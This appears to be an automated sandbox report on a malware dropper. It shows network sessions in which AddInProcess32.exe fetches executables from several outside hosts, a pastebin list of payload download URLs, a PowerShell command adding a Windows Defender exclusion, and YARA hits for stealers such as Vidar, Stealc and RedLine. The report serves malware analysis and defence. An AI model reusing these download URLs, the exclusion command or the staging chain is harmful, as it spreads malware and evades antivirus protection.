                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: 59 c3 8b ff 57 68 54 bc 40 00 ff 15 bc b0 40 00 8b f8 85 ff 75 09 e8 34 fd ff ff 33 c0 5f c3 56 8b 35 b8 b0 40 00 68 90 bc 40 00 57 ff d6 68 84 bc 40 00 57 a3 2c f9 80 00 ff d6 68 78 bc 40 00 57 a3 30 f9 80 00 ff d6 68 70 bc 40 00 57 a3 34 f9 80 00 ff d6 83 3d 2c f9 80 00 00 8b 35 f0 b0 40 00 a3 38 f9 80 00 74 16 83 3d 30 f9 80 00 00 74 0d 83 3d 34 f9 80 00 00 74 04 85 c0 75 24 a1 ec b0 40 00 a3 30 f9 80 00 a1 f4 b0 40 00 c7 05 2c f9 80 00 82 26 40 00 89 35 34 f9 80 00 a3 38 f9 80 00 ff 15 e8 b0 40 00 a3 c4 d1 80 00 83 f8 ff 0f 84 c1 00 00 00 ff 35 30 f9 80 00 50 ff d6 85 c0 0f 84 b0 00 00 00 e8 dd ec ff ff ff 35 2c f9 80 00 8b 35 88 b0 40 00 ff d6 ff 35 30 f9 80 00 a3 2c f9 80 00 ff d6 ff 35 34 f9 80 00 a3 30 f9 80 00 ff d6 ff 35 38 f9 80 00 a3 34 f9 80
                                                                                                                                                                                                                                                            Data Ascii: YWhT@@u43_V5@h@Wh@W,hx@W0hp@W4=,5@8t=0t=4tu$@0@,&@548@50P5,5@50,540584
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: ff ff 59 ff 36 ff 15 1c b1 40 00 5e 5d c3 6a 08 68 50 bf 80 00 e8 cd ea ff ff e8 41 f9 ff ff 8b 40 78 85 c0 74 16 83 65 fc 00 ff d0 eb 07 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff e8 a0 17 00 00 e8 e6 ea ff ff c3 68 d7 2e 40 00 ff 15 88 b0 40 00 a3 90 fa 80 00 c3 8b ff 55 8b ec 8b 45 08 a3 94 fa 80 00 a3 98 fa 80 00 a3 9c fa 80 00 a3 a0 fa 80 00 5d c3 8b ff 55 8b ec 8b 45 08 8b 0d 4c bc 40 00 56 39 50 04 74 0f 8b f1 6b f6 0c 03 75 08 83 c0 0c 3b c6 72 ec 6b c9 0c 03 4d 08 5e 3b c1 73 05 39 50 04 74 02 33 c0 5d c3 ff 35 9c fa 80 00 ff 15 8c b0 40 00 c3 6a 20 68 70 bf 80 00 e8 21 ea ff ff 33 ff 89 7d e4 89 7d d8 8b 5d 08 83 fb 0b 7f 4b 74 15 8b c3 6a 02 59 2b c1 74 22 2b c1 74 08 2b c1 74 59 2b c1 75 43 e8 f5 f7 ff ff 8b f8 89 7d d8 85 ff 75 14 83 c8 ff e9
                                                                                                                                                                                                                                                            Data Ascii: Y6@^]jhPA@xte3@eEh.@@UE]UEL@V9Ptku;rkM^;s9Pt3]5@j hp!3}}]KtjY+t"+t+tY+uC}u
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: 24 04 f7 c1 03 00 00 00 74 24 8a 01 83 c1 01 84 c0 74 4e f7 c1 03 00 00 00 75 ef 05 00 00 00 00 8d a4 24 00 00 00 00 8d a4 24 00 00 00 00 8b 01 ba ff fe fe 7e 03 d0 83 f0 ff 33 c2 83 c1 04 a9 00 01 01 81 74 e8 8b 41 fc 84 c0 74 32 84 e4 74 24 a9 00 00 ff 00 74 13 a9 00 00 00 ff 74 02 eb cd 8d 41 ff 8b 4c 24 04 2b c1 c3 8d 41 fe 8b 4c 24 04 2b c1 c3 8d 41 fd 8b 4c 24 04 2b c1 c3 8d 41 fc 8b 4c 24 04 2b c1 c3 8b ff 55 8b ec 83 ec 24 a1 04 d0 80 00 33 c5 89 45 fc 8b 45 08 53 89 45 e0 8b 45 0c 56 57 89 45 e4 e8 a8 f1 ff ff 83 65 ec 00 83 3d b0 fa 80 00 00 89 45 e8 75 7d 68 00 bd 40 00 ff 15 20 b0 40 00 8b d8 85 db 0f 84 10 01 00 00 8b 3d b8 b0 40 00 68 f4 bc 40 00 53 ff d7 85 c0 0f 84 fa 00 00 00 8b 35 88 b0 40 00 50 ff d6 68 e4 bc 40 00 53 a3 b0 fa 80 00 ff
                                                                                                                                                                                                                                                            Data Ascii: $t$tNu$$~3tAt2t$ttAL$+AL$+AL$+AL$+U$3EESEEVWEe=Eu}h@ @=@h@S5@Ph@S
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 90 39 40 00 8b ff a0 39 40 00 a8 39 40 00 b4 39 40 00 c8 39 40 00 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8a 46 01 88 47 01 8b 45 08 5e 5f c9 c3 8d 49 00 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 8d 74 31 fc 8d 7c 39 fc f7 c7 03 00 00 00 75 24 c1 e9 02 83 e2 03 83 f9 08 72 0d fd f3 a5 fc ff 24 95 2c 3b 40 00 8b ff f7 d9 ff 24 8d dc 3a 40 00 8d 49 00 8b c7 ba 03 00 00 00 83 f9 04 72 0c 83 e0 03 2b c8 ff 24 85 30 3a 40 00 ff 24 8d 2c 3b 40 00 90 40 3a 40 00 64 3a 40 00 8c 3a 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 2c 3b 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef
                                                                                                                                                                                                                                                            Data Ascii: $9@9@9@9@9@E^_E^_FGE^_IFGFGE^_t1|9u$r$,;@$:@Ir+$0:@$,;@@:@d:@:@F#Gr$,;@IF#GFG


                                                                                                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            59 | 192.168.2.5 | 55638 | 104.21.63.71 | 443 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC | 110 | OUT | GET /26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: lawyerbuyer.org
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC | 682 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:01 GMT
                                                                                                                                                                                                                                                            Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                                                                            Content-Length: 4283792
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Last-Modified: Sun, 10 Mar 2024 22:53:03 GMT
                                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                            Age: 5
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3rIiduZgkTzydJdbT25yzP9Na1J1%2FS3PDkQJjM1dny1J9fIwGRIugA91zx97yn00CcGAGuGfWKBn2E%2FdqOLhd2LaCt571%2BRedAvIffotBfHN1shOWbpM6%2Bf1BxTKpIEOhUA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628203aeccb09f1-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            60 | 192.168.2.5 | 55633 | 172.67.177.133 | 443 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC | 106 | OUT | GET /26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: ittrade.org
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC | 678 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:01 GMT
                                                                                                                                                                                                                                                            Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                                                                            Content-Length: 4283768
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Last-Modified: Sun, 10 Mar 2024 22:52:57 GMT
                                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                            Age: 5
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GyPUdmxbN479j85BN1LciWuoGgoDGT4ogwpHt3uN79XXz2WQiTfmQR9Ai5kvjyKa2cWg%2FPLuTPirgkxG2UIsHLEjj4c55jYJ%2BIgSMc3EpU883rTUiDtgt2FePQh%2BPg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628203b3c0b09fb-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            61192.168.2.555639172.67.169.8944344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC41OUTGET /RNWPd.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: yip.su
                                                                                                                                                                                                                                                            2024-03-11 02:31:02 UTC904INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:01 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            memory: 0.36199188232421875
                                                                                                                                                                                                                                                            expires: Mon, 11 Mar 2024 02:31:01 +0000
                                                                                                                                                                                                                                                            strict-transport-security: max-age=604800
                                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                                            CF-Cache-Status: EXPIRED
                                                                                                                                                                                                                                                            Last-Modified: Mon, 11 Mar 2024 02:30:59 GMT
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BIhrDtJhLFROd5oDDmgg0as2POVmuPco0mVGavAMLsOIY4Am6%2BoXibcfMf3sGA%2BLKLaBJmcA%2FySvjyBNisjbPwrUtKPLfoYB61Oas7d9O6lnViMA1%2BF4l1Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628203c5e8409ef-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:31:02 UTC144INData Raw: 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 'absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                                                                                                                                                                                                                            2024-03-11 02:31:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            62192.168.2.555641104.20.68.14344344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC50OUTGET /raw/E0rY26ni HTTP/1.1
                                                                                                                                                                                                                                                            Host: pastebin.com
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC395INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:01 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            x-frame-options: DENY
                                                                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                                                                            x-xss-protection: 1;mode=block
                                                                                                                                                                                                                                                            cache-control: public, max-age=1801
                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                            Age: 8
                                                                                                                                                                                                                                                            Last-Modified: Mon, 11 Mar 2024 02:30:53 GMT
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628203c7f940ad7-LAS
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC | 800 | IN | Data Ascii: 319http://185.172.128.126/InstallSetup5.exehttps://bitbucket.org/j-upsps/microsoft_network1/downloads/a02.exehttps://shipofdestiny.com/baf14778c246e15550645e30ba78ce1c.exehttps://sty.ink/ppg8xhttps://namemail.org/6779d89b7a368f4f3f340b50a9d18d71
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC | 5 | IN | Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            63192.168.2.555640172.67.177.13344344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC | 106 | OUT | GET /26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: ittrade.org
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC680INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:01 GMT
                                                                                                                                                                                                                                                            Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                                                                            Content-Length: 4283768
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Last-Modified: Sun, 10 Mar 2024 22:52:57 GMT
                                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                            Age: 5
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=m1MAdR%2FRuWp%2BPzONBGC1IedvPlYhWs8SQev6X%2BfL8Ao0nNgkc12BmgVvadabPT1QrtGOs9d6msxBeTfreD%2BIGVw5k4hxYv2UYS00pKazZR9tW3t86MJWWnvZd5sF4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628203c7ea50a01-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            64192.168.2.555644104.21.32.14244344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            2024-03-11 02:31:02 UTC | 79 | OUT | GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: shipofdestiny.com
                                                                                                                                                                                                                                                            2024-03-11 02:31:03 UTC699INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:03 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pYYOHmAL61k1prhi30wneQXp3lp%2B6DFR4mkpRE8hnXWEg8PmV5S0qbs76XqsDd33E8POZK4gyQZkxHjigXzMcubaWKf1haLgyyWf%2BZKZMPWqaOVYWafBmJfAW4kDna3M8Imdng%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 862820445c4b0ad5-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:31:03 UTC135INData Raw: 38 31 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 61 77 79 65 72 62 75 79 65 72 2e 6f 72 67 2f 32 36 62 36 32 36 66 65 61 32 39 30 31 35 61 39 66 32 34 65 30 37 61 30 38 66 61 30 31 31 65 34 2f 62 61 66 31 34 37 37 38 63 32 34 36 65 31 35 35 35 30 36 34 35 65 33 30 62 61 37 38 63 65 31 63 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 81<a href="https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe">Temporary Redirect</a>.
                                                                                                                                                                                                                                                            2024-03-11 02:31:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0



                                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                                            Start time:03:30:32
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Imagebase:0x1ebaaa20000
                                                                                                                                                                                                                                                            File size:48'352 bytes
                                                                                                                                                                                                                                                            MD5 hash:F1E075F8CEBE5AACA53ED7C158D81CBD
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                                                            Start time:03:30:49
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dl7WL77rkA.exe" -Force
                                                                                                                                                                                                                                                            Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                                                                            Start time:03:30:50
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                                                                            Start time:03:30:50
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            Imagebase:0xdb0000
                                                                                                                                                                                                                                                            File size:43'008 bytes
                                                                                                                                                                                                                                                            MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000005.00000002.4581208018.000000000A499000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                                            • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000005.00000002.4581208018.000000000A6D9000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                                                                            Start time:03:30:50
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):
                                                                                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            Imagebase:
                                                                                                                                                                                                                                                            File size:43'008 bytes
                                                                                                                                                                                                                                                            MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                                                            Start time:03:30:51
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\WerFault.exe -u -p 3876 -s 134468
                                                                                                                                                                                                                                                            Imagebase:0x7ff77b080000
                                                                                                                                                                                                                                                            File size:570'736 bytes
                                                                                                                                                                                                                                                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:false

Target ID:12
Start time:03:30:56
Start date:11/03/2024
Path:C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe"
Imagebase:0x400000
File size:323'584 bytes
MD5 hash:D9578A8E9EE343BC53B08FD8101F66E9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 58%, ReversingLabs
Reputation:low
Has exited:true

Target ID:13
Start time:03:30:56
Start date:11/03/2024
Path:C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe"
Imagebase:0x400000
File size:1'878'244 bytes
MD5 hash:BD90ED9339BF690DAF83101CAA9EC91A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:14
Start time:03:30:56
Start date:11/03/2024
Path:C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exe"
Imagebase:0x400000
File size:1'878'244 bytes
MD5 hash:BD90ED9339BF690DAF83101CAA9EC91A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:false

Target ID:15
Start time:03:30:57
Start date:11/03/2024
Path:C:\Users\user\AppData\Local\Temp\syncUpd.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\syncUpd.exe
Imagebase:0x400000
File size:203'776 bytes
MD5 hash:DBA6DB51EA13E585AEE6136021836641
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
• Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000F.00000003.2437075338.00000000022D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 0000000F.00000003.2437075338.00000000022D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000F.00000002.2758288970.0000000000958000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000F.00000002.2758267027.0000000000942000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 29%, ReversingLabs
Reputation:low
Has exited:true

Target ID:16
Start time:03:30:58
Start date:11/03/2024
Path:C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exe"
Imagebase:0x400000
File size:4'283'768 bytes
